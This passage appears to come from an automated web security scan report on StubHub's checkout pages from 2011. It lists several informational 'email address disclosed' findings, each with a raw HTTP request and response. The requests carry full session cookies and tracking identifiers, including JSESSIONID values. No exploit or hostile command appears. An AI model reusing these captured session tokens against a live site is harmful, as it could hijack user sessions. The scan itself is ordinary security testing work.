STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; TLTSID=986DBE4039C110390BC5EFD87B2B5667;

Response

HTTP/1.0 302 Moved Temporarily
Date: Wed, 16 Feb 2011 11:42:53 GMT
Server: Apache
Set-Cookie: TLTHID=E3D5265C39C1103900D58A80A84B62C0; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: bc79#182/checkout/CheckoutSignin/ticket_id=281933854&quantity_selected=2&logisticsMethod=2&price=100.0&affiliate_id=null@srwp01byx009.stubprod.com
com-stubhub-dye: bc79#182/checkout/CheckoutSignin/ticket_id=281933854&quantity_selected=2&logisticsMethod=2&price=100.0&affiliate_id=null@srwp01byx009.stubprod.com
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-cache
Location: https://www.stubhub.com/
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


8.6. https://buy.stubhub.com/checkout/assets/default.css  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/assets/default.css

Issue detail

The following email address was disclosed in the response:

Request

GET /checkout/assets/default.css HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
Accept: text/css,*/*;q=0.1
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; mbox=check#true#1297856567|session#1297856457596-151700#1297858367|PC#1297856457596-151700.17#1332070907|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; TLTHID=CD83878639C1103903C3B0044C7300DA; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":7,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":7,"s":true,"e":1}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}

Response

HTTP/1.1 404 Not Found
Date: Wed, 16 Feb 2011 11:42:18 GMT
Server: Apache
Set-Cookie: TLTHID=CEBCC36039C11039A5D3871236610E4F; Path=/; Domain=.stubhub.com
Vary: Accept-Encoding
Keep-Alive: timeout=5, max=1600
Connection: Keep-Alive
Content-Type: text/html; charset=iso-8859-1
Content-Length: 334

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /checkout/assets/default.css was not found on this se
...[SNIP]...
<a href="mailto:technology@stubhub.com">
...[SNIP]...

8.7. https://buy.stubhub.com/checkout/checkout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/checkout

Issue detail

The following email address was disclosed in the response:

Request

GET /checkout/checkout?logisticsMethod=2&price=100.0&quantity_selected=2&ticket_id=281933854 HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; mbox=check#true#1297856609|session#1297856457596-151700#1297858409|PC#1297856457596-151700.17#1332070949|disable#browser%20timeout#1297860107; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":8,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":8,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; TLTHID=D278406039C110390352E52D5035BF67; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011

Response

HTTP/1.1 200 OK
Date: Wed, 16 Feb 2011 11:42:27 GMT
Server: Apache
Set-Cookie: TLTHID=D4150DD639C110390234E07390B95A9D; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: c2c7#4f6/checkout/checkout@srwp01byx010.stubprod.com
com-stubhub-dye: c2c7#4f6/checkout/checkout@srwp01byx010.stubprod.com
Set-Cookie: JSESSIONID=96F40F445A335AAA72307D9D93536BAD; Path=/; Secure
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Content-Length: 20919

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en-US" xmlns:sh="http://www.stubhub.com/NS/wp" xmlns="http://www.w3
...[SNIP]...

8.8. https://buy.stubhub.com/checkout/checkout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/checkout

Issue detail

The following email address was disclosed in the response:

Request

GET /checkout/checkout?logisticsMethod=2&price=100.0&quantity_selected=2&ticket_id=281933854 HTTP/1.1
Host: buy.stubhub.com
Connection: keep-alive
Referer: https://buy.stubhub.com/checkout/CheckoutSignin?ticket_id=281933854&quantity_selected=2&price=100&logisticsMethod=2
Cache-Control: max-age=0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.98 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TLTSID=986DBE4039C110390BC5EFD87B2B5667; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; mbox=check#true#1297856609|session#1297856457596-151700#1297858409|PC#1297856457596-151700.17#1332070949|disable#browser%20timeout#1297860107; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/CheckoutSignin","genre":"default","genreid":"","event":"default","eventid":"default","genreparentid":"","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"'$100.00'","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":8,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":8,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856546782,"l":"en","i":-1}; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; TLTHID=D278406039C110390352E52D5035BF67; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011

Response

HTTP/1.1 200 OK
Date: Wed, 16 Feb 2011 11:42:25 GMT
Server: Apache
Set-Cookie: TLTHID=D34CF4EA39C110390394DC7F81BAC697; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: 1e86#1985/checkout/checkout@srwp01byx004.stubprod.com
com-stubhub-dye: 1e86#1985/checkout/checkout@srwp01byx004.stubprod.com
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-cache
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html;charset=utf-8
Content-Length: 20823

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html lang="en-US" xmlns:sh="http://www.stubhub.com/NS/wp" xmlns="http://www.w3
...[SNIP]...

8.9. https://buy.stubhub.com/checkout/checkout  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/checkout

Issue detail

The following email address was disclosed in the response:

Request

GET /checkout/checkout HTTP/1.1
Host: buy.stubhub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/checkout","genre":"Gipsy Kings Tickets","genreid":"12947","event":"Gipsy Kings Tickets","eventid":"1021598","genreparentid":"12947","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"$100.00","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":8,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":8,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856557280,"l":"en","i":-1}; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; fsr.a=1297856559479; TLTHID=D5786C9039C110397C9DCBB7689B8A72; mbox=check#true#1297856620|session#1297856457596-151700#1297858420|PC#1297856457596-151700.17#1332070960|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; STUB_SESSION=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7CloggedIn%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E1%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cstub_sid%7E%5E%7E2907604027%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7CerrorEventId%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Custat%7E%5E%7E4mB1%2BHDrcuPV4ep1ydOSbA%3D%3D%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; TLTSID=986DBE4039C110390BC5EFD87B2B5667;

Response

HTTP/1.0 302 Moved Temporarily
Date: Wed, 16 Feb 2011 11:42:53 GMT
Server: Apache
Set-Cookie: TLTHID=E3A33A7039C110390240DBEC914A1801; Path=/; Domain=.stubhub.com
com-stubhub-dye-path: c734#505/checkout/checkout@srwp01byx007.stubprod.com
com-stubhub-dye: c734#505/checkout/checkout@srwp01byx007.stubprod.com
Expires: Wed, 31 Dec 1969 23:59:59 GMT
Pragma: no-cache
Cache-Control: no-cache
Location: https://buy.stubhub.com/checkout/ticketnolongeravailable
Content-Length: 0
Connection: close
Content-Type: text/plain; charset=UTF-8


8.10. https://buy.stubhub.com/checkout/checkoutsignin.signin.guestform  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://buy.stubhub.com
Path:   /checkout/checkoutsignin.signin.guestform

Issue detail

The following email address was disclosed in the response:

Request

GET /checkout/checkoutsignin.signin.guestform HTTP/1.1
Host: buy.stubhub.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: fsr.r={"d":90,"i":"1297856459632_689354","e":1298461275657,"s":1}; foresee.analytics=%7B%22rr_domain%22%3A%22stubhub.com%22%2C%22rr_version%22%3A12.1%2C%22rr_group_id%22%3A%221297856458075_6268%22%2C%22reccancelled%22%3Atrue%7D; fsr.s={"cp":{"userid":"","pagetype":"checkout","url":"https://buy.stubhub.com/checkout/checkout","genre":"Gipsy Kings Tickets","genreid":"12947","event":"Gipsy Kings Tickets","eventid":"1021598","genreparentid":"12947","cobrandid":"47","pgeo":"","ipgid":"672","salemethod":"'null'","price":"$100.00","fee":"","TT_variant":"","tt_variant":"Recipe A"},"v":1,"rid":"1297856459632_689354","pv":8,"to":5,"c":"https://buy.stubhub.com/checkout/CheckoutSignin","lc":{"d1":{"v":8,"s":true,"e":2}},"cd":1,"sd":1,"f":1297856557280,"l":"en","i":-1}; STUB_INFO=filler%7E%5E%7E0%7CviewedEvents%7E%5E%7E1021598%2C1022917%7E%5E%7E02%2F16%2F2011; JSESSIONID=96F40F445A335AAA72307D9D93536BAD; STUB_SESS=filler%7E%5E%7E0%7Cipzcode%7E%5E%7E75207%7E%5E%7E02%2F16%2F2011%7Clname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Ceadd%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cusertype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipgid%7E%5E%7E672%7E%5E%7E02%2F16%2F2011%7Cloaded_ip_number%7E%5E%7E2915161843%7E%5E%7E02%2F16%2F2011%7Cutype%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cipcity%7E%5E%7EDallas%7E%5E%7E02%2F16%2F2011%7Cguid%7E%5E%7E9C65BA2A39914907E04400212868B1B6%7E%5E%7E02%2F16%2F2011%7Ccobrand_id%7E%5E%7E47%7E%5E%7E02%2F16%2F2011%7Cotconf%7E%5E%7EMsbzEC9ilH8%3D%7E%5E%7E02%2F16%2F2011%7Csession_geo%7E%5E%7E0%7E%5E%7E02%2F16%2F2011%7Ccobrand%7E%5E%7Ewww%7E%5E%7E02%2F16%2F2011%7Czcode%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cfname%7E%5E%7E%7E%5E%7E02%2F16%2F2011%7Cloaded_stub_uid%7E%5E%7E%7E%5E%7E02%2F16%2F2011; s_sess=%20s_sq%3D%3B%20s_cc%3Dtrue%3B; fsr.a=1297856559479; TLTHID=D5786C9039C110397C9DCBB7689B8A72; mbox=check#true#1297856620|session#1297856457596-151700#1297858420|PC#1297856457596-151700.17#1332070960|disable#browser%20timeout#1297860107; s_pers=%20s_nr%3D1297856508261-New%7C1331984508261%3B; s_vi=[CS]v1|26ADDBE0051D21A9-6000012DA000AA86[CE]; STUB_BROWSE_INFO=ue~%5E~1; 